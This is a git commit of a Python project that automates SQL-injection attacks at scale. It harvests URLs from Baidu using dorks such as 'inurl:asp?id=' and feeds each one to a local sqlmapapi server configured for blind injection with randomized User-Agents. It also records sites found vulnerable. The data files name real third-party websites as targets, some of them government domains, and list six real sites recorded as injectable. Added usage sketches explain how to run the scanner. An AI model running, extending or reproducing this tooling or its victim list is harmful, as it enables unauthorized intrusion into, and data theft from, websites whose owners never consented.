second commit

This commit is contained in:
sowish
2015-11-14 11:35:55 +08:00
commit 813f305db8
10 changed files with 451 additions and 0 deletions

164
AutoSqli.py Executable file

@@ -0,0 +1,164 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
import requests
import time
import json
import threading
import Queue
from search.baidu import *


class AutoSqli(object):
    """
    Drive a running sqlmapapi server through its REST interface:
    create a task, set its options, start the scan, poll the status
    and collect the results.
    """
    def __init__(self, server='', target='', data='', referer='', cookie=''):
        super(AutoSqli, self).__init__()
        self.server = server
        if self.server[-1] != '/':
            self.server = self.server + '/'
        self.target = target
        self.taskid = ''
        self.engineid = ''
        self.status = ''
        self.data = data
        self.referer = referer
        self.cookie = cookie
        self.start_time = time.time()

    def task_new(self):
        # Ask the server for a new task and remember its id.
        self.taskid = json.loads(
            requests.get(self.server + 'task/new').text)['taskid']
        #print 'Created new task: ' + self.taskid
        if len(self.taskid) > 0:
            return True
        return False

    def task_delete(self):
        # Remove the finished task from the server.
        json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
        # if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
        #     #print '[%s] Deleted task' % (self.taskid)
        #     return True
        # return False

    def scan_start(self):
        headers = {'Content-Type': 'application/json'}
        print "starting to scan " + self.target + ".................."
        payload = {'url': self.target}
        url = self.server + 'scan/' + self.taskid + '/start'
        t = json.loads(
            requests.post(url, data=json.dumps(payload), headers=headers).text)
        self.engineid = t['engineid']
        if len(str(self.engineid)) > 0 and t['success']:
            #print 'Started scan'
            return True
        return False

    def scan_status(self):
        self.status = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
        if self.status == 'running':
            return 'running'
        elif self.status == 'terminated':
            return 'terminated'
        else:
            return 'error'

    def scan_data(self):
        # Fetch the scan results; non-empty data means an injection was found.
        self.data = json.loads(
            requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
        if len(self.data) == 0:
            #print 'not injection\t'
            pass
        else:
            f = open('data/injection.txt', 'a')
            f.write(self.target + '\n')
            f.close()
            print 'injection \t'

    def option_set(self):
        # Randomize the User-Agent and restrict the techniques to
        # boolean-based blind (B) and time-based blind (T).
        headers = {'Content-Type': 'application/json'}
        option = {"options": {
                      "randomAgent": True,
                      "tech": "BT"
                  }}
        url = self.server + 'option/' + self.taskid + '/set'
        t = json.loads(
            requests.post(url, data=json.dumps(option), headers=headers).text)
        #print t

    def scan_stop(self):
        json_stop = requests.get(self.server + 'scan/' + self.taskid + '/stop').text
        # json.loads(
        #     requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']

    def scan_kill(self):
        json_kill = requests.get(self.server + 'scan/' + self.taskid + '/kill').text
        # json.loads(
        #     requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']

    def run(self):
        if not self.task_new():
            return False
        self.option_set()
        if not self.scan_start():
            return False
        while True:
            if self.scan_status() == 'running':
                time.sleep(10)
            elif self.scan_status() == 'terminated':
                break
            else:
                break
            #print time.time() - self.start_time
            if time.time() - self.start_time > 500:
                # Give up on targets that keep the engine busy for more than 500 seconds.
                self.scan_stop()
                self.scan_kill()
                break
        self.scan_data()
        self.task_delete()
        #print time.time() - self.start_time


class myThread(threading.Thread):
    def __init__(self, q, thread_id):
        threading.Thread.__init__(self)
        self.q = q
        self.thread_id = thread_id

    def run(self):
        # Pull AutoSqli objects off the shared queue until it is drained.
        while True:
            try:
                # Non-blocking get: another worker may have emptied the queue
                # between checking it and fetching from it.
                objects = self.q.get(False)
            except Queue.Empty:
                break
            #print "threading " + str(self.thread_id) + " is running"
            result = objects.run()


if __name__ == '__main__':
    urls = []
    print 'the program starts!'
    key = 'inurl:asp?id='
    pages = 3
    urls = geturl(key, pages)
    #print urls
    workQueue = Queue.Queue()
    for tar in urls:
        s = AutoSqli('http://127.0.0.1:8775', tar)
        workQueue.put(s)
    threads = []
    nloops = range(4)   # number of worker threads
    for i in nloops:
        t = myThread(workQueue, i)
        t.start()
        threads.append(t)
    for i in nloops:
        threads[i].join()
    print "Exiting Main Thread"
    # t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191')
    # t.run()

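For reference, AutoSqli.py assumes a sqlmapapi REST server is already listening on 127.0.0.1:8775 (sqlmap ships one: sqlmapapi.py run in server mode). A minimal sketch of a single-target run that reuses the class above and skips the Baidu crawl; the target URL here is a placeholder, not a real test site:

#!/usr/bin/python
# Minimal sketch, assuming a sqlmapapi server is reachable on 127.0.0.1:8775
# and this file sits next to AutoSqli.py. The target URL is a placeholder.
from AutoSqli import AutoSqli

if __name__ == '__main__':
    scan = AutoSqli('http://127.0.0.1:8775', 'http://example.com/item.php?id=1')
    # run() creates a task, sets the options, starts the scan, polls the status,
    # records any finding in data/injection.txt and finally deletes the task.
    scan.run()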
0
README Normal file

6
data/injection.txt Executable file

@@ -0,0 +1,6 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12

20
data/targets.txt Executable file

@@ -0,0 +1,20 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

1
keyword.txt Executable file

@@ -0,0 +1 @@
site:.hk inurl:.php?

0
search/__init__.py Executable file

BIN
search/__init__.pyc Executable file

Binary file not shown.

88
search/baidu.py Executable file

@@ -0,0 +1,88 @@
#coding: utf-8
import urllib2
import urllib
import re
import random

user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
               'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
               'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
               (KHTML, like Gecko) Element Browser 5.0', \
               'IBM WebExplorer /v0.94', 'Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)', \
               'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \
               'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', \
               'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) \
               Version/6.0 Mobile/10A5355d Safari/8536.25', \
               'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \
               Chrome/28.0.1468.0 Safari/537.36', \
               'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']


def baidu_search(keyword, pn):
    # rn is the number of results per page; pn is the offset of the first
    # result shown on the current page.
    p = {'wd': keyword}
    res = urllib2.urlopen(("http://www.baidu.com/s?" + urllib.urlencode(p) + "&pn={0}&cl=3&rn=10").format(pn))
    html = res.read()
    return html


def getList(regex, text):
    # Collect every match of regex in text into a list.
    arr = []
    res = re.findall(regex, text)
    if res:
        for r in res:
            arr.append(r)
    return arr


def getMatch(regex, text):
    # Return the first match of regex in text, or '' when there is none.
    res = re.findall(regex, text)
    if res:
        return res[0]
    return ''


def is_get(url):
    # Return the script path of a GET-style link that sqlmap can test,
    # or 0 when the URL carries no query-string parameters.
    regex = r'(\S*?)\?.*=.*'
    res = re.match(regex, url)
    if res:
        #print res.group(1)
        return res.group(1)
    else:
        return 0

# def Deduplication():
#     regex=r'\S'


def geturl(keyword, pages):
    # Crawl the Baidu result pages for the keyword and collect de-duplicated target URLs.
    targets = []
    hosts = []
    for page in range(0, int(pages)):
        pn = (page + 1) * 10
        html = baidu_search(keyword, pn)
        content = unicode(html, 'utf-8', 'ignore')
        arrList = getList(u"<div class=\"f13\">(.*)</div>", content)   # split the page into result blocks
        #print arrList
        # f2=open('content.txt','a')
        # f2.write(str(arrList)+'\n')   # debugging: dump the raw result blocks
        # f2.close()
        for item in arrList:
            regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
            link = getMatch(regex, item)
            if not link:
                continue
            url = link[1]   # the redirect URL rewritten by Baidu
            try:
                domain = urllib2.Request(url)
                domain.add_header('User-agent', random.choice(user_agents))
                domain.add_header('connection', 'keep-alive')
                response = urllib2.urlopen(domain)
                uri = response.geturl()   # follow the redirect to get the real URL
                urs = is_get(uri)         # script path, used for de-duplication
                if (uri in targets) or (urs in hosts):
                    continue
                else:
                    targets.append(uri)
                    hosts.append(urs)
                    f1 = open('data/targets.txt', 'a')   # save the collected target URLs
                    f1.write(uri + '\n')
                    f1.close()
            except:
                continue
    print "urls have been grabbed already!!!"
    return targets

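baidu.py is imported wholesale by AutoSqli.py, but the crawler can also be driven on its own. A minimal sketch, assuming it is run from the repository root (so data/targets.txt is writable), using the dork stored in keyword.txt:

#!/usr/bin/python
# Minimal sketch: crawl two Baidu result pages for a dork and print the
# de-duplicated targets that geturl() also appends to data/targets.txt.
from search.baidu import geturl

if __name__ == '__main__':
    targets = geturl('site:.hk inurl:.php?', 2)   # dork taken from keyword.txt, 2 result pages
    for t in targets:
        print t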
BIN
search/baidu.pyc Executable file

Binary file not shown.

172
set_option.txt Executable file

@@ -0,0 +1,172 @@
{
    "options": {
        "crawlDepth": null,
        "osShell": false,
        "getUsers": false,
        "getPasswordHashes": false,
        "excludeSysDbs": false,
        "uChar": null,
        "regData": null,
        "cpuThrottle": 5,
        "prefix": null,
        "code": null,
        "googlePage": 1,
        "query": null,
        "randomAgent": false,
        "delay": 0,
        "isDba": false,
        "requestFile": null,
        "predictOutput": false,
        "wizard": false,
        "stopFail": false,
        "forms": false,
        "taskid": "73674cc5eace4ac7",
        "skip": null,
        "dropSetCookie": false,
        "smart": false,
        "risk": 1,
        "sqlFile": null,
        "rParam": null,
        "getCurrentUser": false,
        "notString": null,
        "getRoles": false,
        "getPrivileges": false,
        "testParameter": null,
        "tbl": null,
        "charset": null,
        "trafficFile": null,
        "osSmb": false,
        "level": 1,
        "secondOrder": null,
        "pCred": null,
        "timeout": 30,
        "firstChar": null,
        "updateAll": false,
        "binaryFields": false,
        "checkTor": false,
        "aType": null,
        "direct": null,
        "saFreq": 0,
        "tmpPath": null,
        "titles": false,
        "getSchema": false,
        "identifyWaf": false,
        "checkWaf": false,
        "regKey": null,
        "limitStart": null,
        "loadCookies": null,
        "dnsName": null,
        "csvDel": ",",
        "oDir": null,
        "osBof": false,
        "invalidLogical": false,
        "getCurrentDb": false,
        "hexConvert": false,
        "answers": null,
        "host": null,
        "dependencies": false,
        "cookie": null,
        "proxy": null,
        "regType": null,
        "optimize": false,
        "limitStop": null,
        "mnemonics": null,
        "uFrom": null,
        "noCast": false,
        "testFilter": null,
        "eta": false,
        "threads": 1,
        "logFile": null,
        "os": null,
        "col": null,
        "rFile": null,
        "verbose": 1,
        "aCert": null,
        "torPort": null,
        "privEsc": false,
        "forceDns": false,
        "getAll": false,
        "api": true,
        "url": null,
        "invalidBignum": false,
        "regexp": null,
        "getDbs": false,
        "freshQueries": false,
        "uCols": null,
        "smokeTest": false,
        "pDel": null,
        "wFile": null,
        "udfInject": false,
        "tor": false,
        "forceSSL": false,
        "beep": false,
        "saveCmdline": false,
        "configFile": null,
        "scope": null,
        "dumpAll": false,
        "torType": "HTTP",
        "regVal": null,
        "dummy": false,
        "commonTables": false,
        "search": false,
        "skipUrlEncode": false,
        "referer": null,
        "liveTest": false,
        "purgeOutput": false,
        "retries": 3,
        "extensiveFp": false,
        "dumpTable": false,
        "database": "/tmp/sqlmapipc-EmjjlQ",
        "batch": true,
        "headers": null,
        "flushSession": false,
        "osCmd": null,
        "suffix": null,
        "dbmsCred": null,
        "regDel": false,
        "shLib": null,
        "nullConnection": false,
        "timeSec": 5,
        "msfPath": null,
        "noEscape": false,
        "getHostname": false,
        "sessionFile": null,
        "disableColoring": true,
        "getTables": false,
        "agent": null,
        "lastChar": null,
        "string": null,
        "dbms": null,
        "tamper": null,
        "hpp": false,
        "runCase": null,
        "osPwn": false,
        "evalCode": null,
        "cleanup": false,
        "getBanner": false,
        "profile": false,
        "regRead": false,
        "bulkFile": null,
        "safUrl": null,
        "db": null,
        "dumpFormat": "CSV",
        "alert": null,
        "user": null,
        "parseErrors": false,
        "aCred": null,
        "getCount": false,
        "dFile": null,
        "data": null,
        "regAdd": false,
        "ignoreProxy": false,
        "getColumns": false,
        "mobile": false,
        "googleDork": null,
        "sqlShell": false,
        "pageRank": false,
        "tech": "BEUSTQ",
        "textOnly": false,
        "commonColumns": false,
        "keepAlive": false
    }
}
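set_option.txt reads like a captured dump of the full per-task option set that sqlmapapi exposes. As a hedged sketch (assuming the same local server on port 8775 that AutoSqli.py uses), the options can be listed and overridden through the task option endpoints; the override below mirrors the two values that option_set() changes (randomAgent and tech):

# Minimal sketch: inspect and override sqlmapapi task options.
import json
import requests

server = 'http://127.0.0.1:8775/'
taskid = json.loads(requests.get(server + 'task/new').text)['taskid']

# The option list of a fresh task has the same shape as set_option.txt.
options = json.loads(requests.get(server + 'option/' + taskid + '/list').text)
print json.dumps(options, indent=4)

payload = {'options': {'randomAgent': True, 'tech': 'BT'}}
requests.post(server + 'option/' + taskid + '/set',
              data=json.dumps(payload),
              headers={'Content-Type': 'application/json'})

requests.get(server + 'task/' + taskid + '/delete')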